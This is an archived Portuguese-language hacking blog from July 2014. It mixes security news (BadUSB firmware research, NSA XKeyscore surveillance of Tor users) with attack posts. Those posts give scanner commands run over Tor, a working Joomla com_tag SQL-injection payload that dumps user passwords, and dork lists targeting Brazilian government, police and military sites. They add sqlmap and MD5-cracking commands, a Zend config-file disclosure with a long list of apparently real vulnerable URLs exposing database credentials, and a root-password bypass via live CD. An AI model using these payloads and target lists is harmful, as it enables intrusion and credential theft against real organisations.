quinta-feira, 31 de julho de 2014

USB possui brecha de segurança que não pode ser resolvida.

Black Hat 2014 desse ano promete viu ~

Dois pesquisadores de segurança estão prestes a divulgar uma descoberta sobre o USB que decreta o formato como um dos mais inseguros da atualidade.

Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.  Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.  Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.  O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.  Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.  O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.  Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "



Karsten Nohl e Jakob Lell construíram provas de conceito indicando que é possível contaminar uma unidade USB sem tocar na memória flash, focando apenas no firmware que controla suas funções.

Isso significa que nem a varredura mais completa encontraria o arquivo malicioso, e que qualquer coisa que use saída USB pode ser infectada - incluindo periféricos como teclado e mouse, além de pendrives.

Eles conseguiram colocar malwares nos chips usados para conectar um dispositivo ao computador e esses arquivos maliciosos são capazes de controlar funções e alterar pastas, além de direcionar o tráfego da internet a sites de interesse do atacante. Tudo sem serem notados.

O USB pode infectar o computador ou ser infectado por ele, e em nenhum dos casos o usuário comum tem chance de descobrir. Apenas um especialista com conhecimentos em engenharia reversa poderia encontrar o problema, mas só se estivesse procurando - e o firmware não costuma levantar suspeitas.

Os pesquisadores mostrarão como isso funciona durante a Black Hat, conferência anual sobre segurança que ocorre na semana que vem em Las Vegas, na intenção de estimular as pessoas a tomarem cuidado com o USB, porque este é um problema sem solução.

O que Nohl e Lell pretendem com a divulgação de suas descobertas é fazer um alerta para que as pessoas tratem dispositivos como pendrives da mesma forma que tratam seringas: cada um só pode usar o seu. É a única forma de garantir que não haverá complicações.

Nesta nova forma de pensar, você tem que considerar uma USB infectados e jogá-lo fora assim que ele toca em um computador não-confiável. "

Nohl e Lell, os investigadores para a consultoria de segurança SR Labs, estão longe de ser o primeiro a apontar que os dispositivos USB pode armazenar e espalhar malware. Mas os dois hackers não se limitou a copiar as suas próprias infecções com códigos personalizados para a memória de dispositivos USB '. Eles passaram meses engenharia reversa do firmware que executa as funções básicas de comunicação de dispositivos USB-os chips controladores que permitem que os dispositivos para se comunicar com um computador e permitir que os usuários mover arquivos dentro e fora deles. Sua descoberta central é que firmware USB, que existe em diferentes formas em todos os dispositivos USB, pode ser reprogramado para esconder código de ataque. "Você pode dar a seu povo em segurança de TI, eles digitalizá-lo, apagar alguns arquivos, e dá-lo de volta para você dizendo que é 'clean'", diz Nohl. Mas a menos que o cara de TI tem as habilidades de engenharia reversa para encontrar e analisar se o firmware, "o processo de limpeza nem sequer tocar os arquivos de que estamos falando."

http://www.wired.com/2014/07/usb-security/

terça-feira, 29 de julho de 2014

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5


Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.


 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)

segunda-feira, 28 de julho de 2014

Video Aula 01 - Curso Black Hat

Vídeo aula com um conteúdo vasto voltado para pentest, fingerprint, googlehacking, eng social, captura de dados em BD entre outros assuntos.
Vídeo aula feita pelo grupo eSecurity


Conteudo da Video Aula 

Principais ataques
•Google Hacking
•Exemplos de uso
•Coletando usuários e senhas com Google Hacking
•Engenharia Social
•Tipos de Engenharia Social
•Demonstração de Engenheiros Sociais
•Engenharia Social para o mal
•Varredura com Nmap
•Efetuando varreduras básicas
•Three Way Handshake
•Varreduras menos barulhentas
•DoS x DDoS
•Qual a diferença
•Exercícico: Derrubando site com ataque DoS Layer 7
•Exercicio – Escalação de Privilégios
•Escalar privilégios
•Infectando com PHP
•Subindo uma Shell
•Shell 404
•Roubando dados do BD

Download >>> #SnakeTomahawk 
"Aquele que não compartilha seu conhecimento, deixa morrer consigo os frutos de sua sabedoria".

INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:

     ID::
    USERNAME::
    NOME::
    PRIMEIRO NOME::
    SOBRENOME::
    SEXO::
    LOCAL::
    FOTO LOGO PEQUENA::
    FOTO LOGO GRANDE::
    FOTO LOGO::
    FOTO::


Exemplo de uso:

[+] Pesquisa dados facebook, Ex: php face.php zuck

[ RETORNO ]
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Baixar:: http://pastebin.com/TdfymVXr

Dorks variadas voltadas pra sqlinjection.

Busca erros sql sites .gov, falhas fbconnect_action e outras variantes de erros.
Dorks variadas voltadas pra sqlinjection.


site:.websiteseguro.com inurl:produto.php?id=
site:.com /ccbill/  "DOCUMENT_ROOT" ext:cgi
inurl:game.php?id=
inurl:mil inurl:"/?fbconnect_action=myhome"
site:.gov.br "Microsoft OLE DB Provider"
site:.esporte.gov.br ext:asp
site:.esporte.gov.br (id|new|ver)
site:.esporte.gov.br (id|new|ver)
site:.psdb.org.br ext:asp id
site:.websiteseguro.com inurl:produto.php?id=
site:.globo.com ext:php mysql_
site:.gov.br .php?id= syntax; -pdf -policiacivil
site:.gov.br SQL "syntax;"
site:.ap.gov.br "SQL syntax;" ext:php
site:.gov.br ext:sql -svn
site:.nsa.gov PDF -public_info
site:.mil.br "mil br" index.php?option= view
site:.com inurl:tinybrowser ext:php intitle: TinyBrowser
site:.gov.br (error) mysql (prefeitura) ext:php -pdf
site:br index.php?option=com_user
site:.gov.br .php?id= syntax;
site:.gov.br ext:php (id*=|view=)
site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"
site:rj.gov.br (php|asp|aspx) ? id
site:.gov.br syntax; -pdf inurl:(|&id=|?id=|)
site:br ext:asp (id*=|view=) 80040E14
site:.com.br ext:asp (id*=|view=) 80040E14 -superasp
site:.anatel.gov.br ext:asp
site:.gov.br (php|asp|aspx) ? id notic
site:.mg.gov.br (php|asp) ?id=
intitle:camara site:.gov.br ext:php (id*=|view=)
intitle:camara site:.gov.br ext:php (id*=|view=) -projetodomhelder
intitle:prefeitura site:.gov.br ext:php (id*=|view=) syntax;
inurl:?fbconnect_action= myhome&fbuserid=*
site:br inurl:view.php?id=* ext:php -Bug -moodle
site:.com.br inurl:"ver_news.php?id="
site:.ceara.gov.br ext:asp
site:.sp.gov.br inurl:.php? intext:"Warning" -policiacivil
intext:"vBulletin" inurl:install/upgrade.php
site:.ceara.gov.br ext:asp
site:.ceara.gov.br ext:asp "*.asp?" "=*"
inurl:.policiacivil.sp.gov.br modules
inurl:.policiacivil.sp.gov.br modules ".php?"
inurl:"/?fbconnect_action=myhome"
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
site:.ar inurl:fbconnect_action= fbuserid= intext:User
site:.ar inurl:fbconnect_action= fbuserid=
inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) inurl:fbconnect_action= fbuserid= intext:User
(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php (id*=|view=)
inurl:(uk|br|com|ar|bo|info|net|org|us|in|au|es|fr) ext:php  inurl:pageid?
inurl:.policiacivil.sp.gov.br modules
site:sp.gov.br "Warning:" ext:php

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 18 de julho de 2014

DecrypterMD5 API

[ INURLBR API DecrypterMD5  ]
 bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt
[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]



INURLBR API DecriptMD5
----------------------------------------------------------------------------------
INURLBR API DecriptMD5  RESULTADOS

Proxy camuflagem envio de request.
- Exemplo: --proxy {proxy:porta}
- Uso:        --proxy localhost:8118
                  --proxy socks5://googleinurl@localhost:9050
                  --proxy http://admin:12334@172.16.0.90:8080

O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.

Baixar:: http://pastebin.com/grYTVJKF

quarta-feira, 16 de julho de 2014

Explorando falha no Zend Framework Full Info Disclosure

Explorando Full Info Disclosure

Explorando falha no Zend Framework Full Info Disclosure

Tal falha disponibiliza a leitura do arquivo ini dentro de aplicações web que usam  Zend Framework, tais aquivos contem senhas de bancos e smtp.

Vulnerabilidade[0]=> http://target.com/application/configs/{arquivo}.ini
Ex:
http://target.com/application/configs/application.ini
http://target.com/application/configs/db.ini
http://target.com/application/configs/config.ini

Conteúdo de arquivo podemos encontrar os seguintes parâmetros.


//Dados de acesso banco
resources.db.params.host = "mysql.taget.com.br"
resources.db.params.username = "root"
resources.db.params.password = "123455"


//E também dados de acesso smtp
resources.mail.transport.host ="smtp.target.com.br"
resources.mail.transport.auth = "loginre"
sources.mail.transport.username = "wangxydlutre"
sources.mail.transport.password = "12333"


DORK[0]=> inurl:/application/configs/application.ini

DORK[1]=>
site:com ext:ini inurl:/application/  -inurl:"git*" -github -assembla -inurl:mozilla -inurl:google "params.password"

DORK[2]=> -site:.google.com -site:.github.com -site:.sourceforge.net -site:.googlecode.com inurl:/application/configs/ "params" ext:ini

DORK[3]=> inurl:/configs/ "params.password" db.ini ext:ini

DORK[4]=> -github.com -mozilla.org -.google.com inurl:/application/  ext:ini password



[+][ COMMND SCANNER INURLBR ]
./inurlbr.php --dork 'site:com ext:ini inurl:/application/  -github -assembla -inurl:mozilla -inurl:svn "params.password"'  -s zend.txt -q 1,6,7,14,22


[+][ VALIDATION ZEND FRAMEWORK ]
$validation['ZEND-FRAMEWORK-01'] = 'mail.transport.username';
$validation['ZEND-FRAMEWORK-02'] = 'mail.transport.password';
$validation['ZEND-FRAMEWORK-03'] = 'db.params.username';
$validation['ZEND-FRAMEWORK-04'] = 'db.params.password';
$validation['ZEND-FRAMEWORK-05'] = 'db.params.dbname';

0xExemplo de achado:

0xExemplo de achado: zend

https://www.thoex.com/urrunarrak-handball/application/configs/application.ini?
https://www.thoex.com/urrunarrak2/application/configs/application.ini?
http://www.rydusa.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://snobmonkey.com/test/application/configs/application.ini?
http://www.firecompanies.com/MFC/application/config/application.ini?
http://www.statzpack.com/soccer_web/soccer/application/config/config.ini?
http://danielberard.com/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://www.kreatera.com/library/Benux/Application/configs/application.ini?
http://www.tremendosoftware.com/sms/application/configs/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://galaxybis.com/demos/zf1/application/configs/application.ini?
http://www.ovdev.mit-consult.com/orizonqs/application/configs/application.ini?
http://amdinner.com/admin/application/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini?
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini?
http://www.aps-cctv.com/boardPhotos/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://developer.camerocks.com/temp/newscan/application/configs/application.ini?
http://svn.turbocrms.com/trac/browser/clients/agencyengland/jorvik/backend/application/configs/application.ini?
http://www.comsucopia.com/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://paintourhome.com/application/configs/application.ini?
https://svn.kenai.com/svn/hoolahoop~subversion/application/configs/application.ini?
http://www.video-games-museum.com/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?
http://framework.zend.com/issues/secure/attachment/12363/application.ini?
http://bizarrefx.com/bfx/searchd/searchdlnew/application/configs/application.ini?


http://www.getsocialwithrb.com/rec0219/airwick/application/configs/application.ini
http://www.aps-cctv.com/boardPhotos/application.ini
http://snobmonkey.com/test/application/configs/application.ini
http://velcro-lab.com/touch/application/configs/application.ini
http://www.ratcmatrimony.com/application/configs/application.ini
http://ucgoz.com/deneme2/application/configs/application.ini
http://ifood.introserver.com/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/admin/application/configs/application.ini
http://www.altusinfra.com/application/configs/application.ini
http://www.thenamesticker.com/application/configs/application.ini
http://stasdavydov.com/price_cmp/application/configs/application.ini
https://www.mitylite.com/application/configs/application.ini
http://dev.blancali.com/_old2/application/configs/application.ini
http://city-immobilier.com/application/configs/application.ini
http://www.emotionla.com/staging/vivanda/vivanda-mobile/application/configs/application.ini
http://23sec.com/api/application/configs/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
http://www.rydusa.com/application/configs/application.ini
http://www.prod2020.com/_hybris-cra/application/configs/application.ini
http://xolotlti.com/fabricadecine/application/configs/application.ini
http://www.test.unibox.com/application/configs/application.ini
http://eksiogluakdeniz.com/maltepe/application/configs/application.ini
http://users.spytosave.com/spyapp/application/configs/application.ini
http://www.monigrafica.com/application/configs/application.ini
http://clossmancommunications.com/frapi/admin/application/config/application.ini
http://archi-tech-media.com/thedigitalkingdom/application/configs/application.ini
http://www.kreatera.com/library/Benux/Application/configs/application.ini
http://li258-109.members.linode.com/application/configs/application.ini
http://www.techques.com/question/1-4484965/How-to-set-database-time-zone-in-application.ini
http://bizarrefx.com/bfx/searchd/application/configs/application.ini
http://www.hellobrothers.com/jobs/application.ini
http://www.ovdev.mit-consult.com/exc1/application/configs/application.ini
http://www.digitalismylife.com/quizz/admin/application/configs/application.ini
http://www.digilibro.com/Crisol/RestServer/application/configs/application.ini
http://secure.vfwebserver.com/ewe/application/configs/application.ini
http://ihuntyou.com/agrobrain/trunk/application/configs/application.ini
http://ronlinecdn.com/st/application/configs/application.ini
http://yodpolitician.yodsoft.com/application/configs/application.ini
http://kerberosdevelopment.com/centurion/application/configs/db.ini
http://www.dev-stagingserver.com/noophy/application/configs/application.ini
http://www.intell-sol.com/subdomains/wandelion/admin/application/configs/application.ini
http://paintourhome.com/application/configs/application.ini
http://www.mywebsitedemos.com/broomberg/application/configs/application.ini
http://fidelcrm.com/fbconnect/zblog/application/configs/application.ini
http://developermalik.com/chad/application/configs/application.ini
http://developermalik.com/uPolitics/application/configs/application.ini
http://km.comuf.com/application/configs/application.ini
http://qljsystems.com/doctrine2/ralphschindler-NOLASnowball-3c9f906/application/configs/application.ini
http://50-87-21-130.unifiedlayer.com/astonis/application/configs/application.ini
http://bepcongnghiepjsc.com/application/configs/application.ini
http://galaxybis.com/demos/zf1/application/configs/application.ini
http://masdag.com/watchit/application/configs/config.ini
http://www.comsucopia.com/application/configs/application.ini
http://campusrain.com/wow/application/configs/application.ini
http://www.myanmar-restaurants.com/updates/myanmar/stage/application/configs/sites/myanmar-updates.ini
http://churchcims.com/staging/application/configs/application.ini
http://hashib23.uniquewebers.com/hospital/application/configs/application.ini
http://support.orioly.com/svjetskiputnik.hr/application/configs/application.ini
http://tmh.riktamtech.com/blinkword/application/configs/application.ini
http://shopping.idincorp.com/application/configs/application.ini
https://www.arabforwarding.com/vhosts/loyacjordan.org/httpdocs/loyac/application/configs/application.ini
https://www.arabforwarding.com/vhosts/__www.fnms-medical.com/httpdocs/application/configs/application.ini
http://elamatute.com/application/configs/application.ini
http://www.originalsexnetwork.com/application/configs/application.ini
http://www.palstu.com/contactus2/application/configs/application.ini
http://web.ontuts.com/wp-content/uploads/tutoriales/zendframework/zendframework_layouts/application/config/application.ini
https://daralyasmine.com/vhosts/daralyasmine.com/httpdocs/application/configs/application.ini
http://www.tributosonline.com/application/configs/application.ini
http://www.nichequotes.com/zend/application/config.ini
http://webkathon.com/alumni/application/configs/application.ini
http://web1.kindlebit.com/PHP-Team/vijay/don/codecanyon-4210316-monsterfile-multiuser-file-management/MonsterFile/application/configs/monster.ini
http://www.investmysite.com/application/config/config_db.ini
http://dulichcampuchiagiare.com/application/configs/application.ini
http://eshopbox.com/checkout/application/configs/application.ini
http://www.oi915.com/application/modules/admin/application.ini
https://xp-dev.com/sc/diff/71005/39/45//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
https://xp-dev.com/sc/71005/65//application/configs/application.ini
http://www.prod2020.com/france-tv/application/configs/db.ini
http://amdinner.com/admin/application/application.ini
http://www.emotionla.com/clientes/plazavea/plazavea-qr/application/configs/application.ini
http://staging.gonabit.com/hintbased.com/application/configs/application.ini
http://www.palstu.com/tawjihi/application/configs/application.ini
http://ronlinecdn.com/sap/application/configs/application.ini
http://myanmar-restaurants.com/updates/movie/prod/application/configs/sites/myanmar-updates.ini
Exploit:
http://www.exploit-db.com/exploits/29921/

terça-feira, 15 de julho de 2014

ALGORITHM filme sobre hacking

<the_hacker_movie>

No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia

No centro da trama de ALGORITHM são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.

Primeiro Trailer

http://www.thehackermovie.com/

QUEBRAR SENHA DO ROOT com live CD


QUEBRAR SENHA DO ROOT
QUEBRAR SENHA DO ROOT
Acessando seu disco rígido com live CD.
Monta a partição, por exemplo: $mount /dev/sda2/ /mnt
Caso não tenha a pasta mnt crie ela:  mkdir /mnt

Acessa a partição/sistema com o chroot: $chroot /mnt /bin/bash

Agora todo comando que for efetuado no terminal vai ser executado na maquina real,
Ou seja trocar a senha root do seu usuário
Ex:
$passwd usuário
$passwd root

Existe outra forma

Depois de montar a partição e executar o comando chroot


sudo gedit /etc/shadow

Primeira linha algo assim
root:AQUI_TEM_SENHA:16100:0:99999:7:::
Ex: root:$6$DsDwdas$4xFds.EfzTJl3I:16100:0:99999:7:::
Apague a senha
Vai ficar algo assim:
root::16100:0:99999:7:::

Feche o arquivo e salvando o mesmo, logo depois reinicia a maquina sem o cdlive.

E troque a senha do root, o mesmo serve para outros usuários.

$passwd root

quinta-feira, 3 de julho de 2014

joomla component com_tag (tag_id) SQL Injection Vulnerability

[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection


0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component 


Exemplo: 


http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1

/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}

Injetando:

http://
WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

RESPOSTA:

[X] com_tag (tag_id) Vulnerável a SQL-injection



REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability

ALGUNS RESULTADOS:
Usando scanner INURLBR:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY

XKeyscore exposto: NSA define todos os utilizadores da rede Tor alemães como "extremistas".

XKeyscore exposto:  NSA define todos os utilizadores da rede Tor alemães como "extremistas".


A NSA foi revelado para marcar e considerar potenciais "extremistas" todos os usuários do serviço de internet anonymizer Tor. Entre aqueles que são centenas de milhares de pessoas preocupadas privacidade como jornalistas, advogados e ativistas de direitos.

Procurando software de criptografia, como o sistema operacional baseado em Linux Tails também coloca você no grid NSA, como Lena Kampf, Jacob Appelbaum e John Goetz revelado no site alemão Tagesschau. O relatório é baseado na análise do código-fonte do software usado por um programa de vigilância eletrônica XKeyscore da NSA.

Tor é um sistema de servidores, que encaminha as solicitações de usuários por meio de uma camada de conexões seguras para torná-lo impossível identificar IP de um usuário a partir dos endereços dos sites que ele / ela visita. A rede de cerca de 5.000 é operado por entusiastas e usado por centenas de milhares de pessoas de privacidade-preocupado todo o mundo. Alguns deles vivem em países com regimes opressivos, que punem os cidadãos para visitar sites que considerem inapropriado.

Mas o site apenas visitar projeto Tor coloca você na lista vermelha da NSA, diz o relatório. Mas o mais importante é que ele monitora as conexões com os chamados Autoridades Directory, os oito servidores, que atuam como gateways para todo o sistema.

A NSA foi particularmente vigiar alemão baseado Autoridades Diretório Tor. Uma é operado pelo grupo de hackers com sede na Alemanha Chaos Computer Club, o outro pelo estudante de ciência da computação Sebastian Hahn, que disse aos jornalistas que a revelação é "chocante".

O sistema em si não parece ser comprometida no entanto, mas a NSA recebe dados como endereços IP de quem o utiliza, o suficiente para cross-referenciá-los com outras bases de dados da agência tem acesso.

 Rede anonymizer Tor entre as metas da NSA, vazamentos Snowden revelar

Há indícios de que a NSA pode ser de coleta não só os metadados das pessoas na lista, mas também ler as suas trocas de e-mail com Tor.

Um interesse em Tor não é a única maneira de fazê-lo a lista de vigilância da NSA. Até mesmo buscas na web para outro software de criptografia faz de você um alvo, bem como, segundo o relatório.

Perturbadoramente, comenta programador NSA na etiqueta de código fonte desses pego pelo sistema americano "extremistas".

O relatório diz que XKeyscore marca todas as pessoas que atingiram a luz vermelha em sua grade, com excepção dos conectando de membros dos cinco olhos, um grupo de países a cooperar na recolha de informações, ou seja, os EUA, Reino Unido, Canadá, Austrália e Nova Zelândia .

Fonte: http://rt.com/news/170208-nsa-spies-tor-users/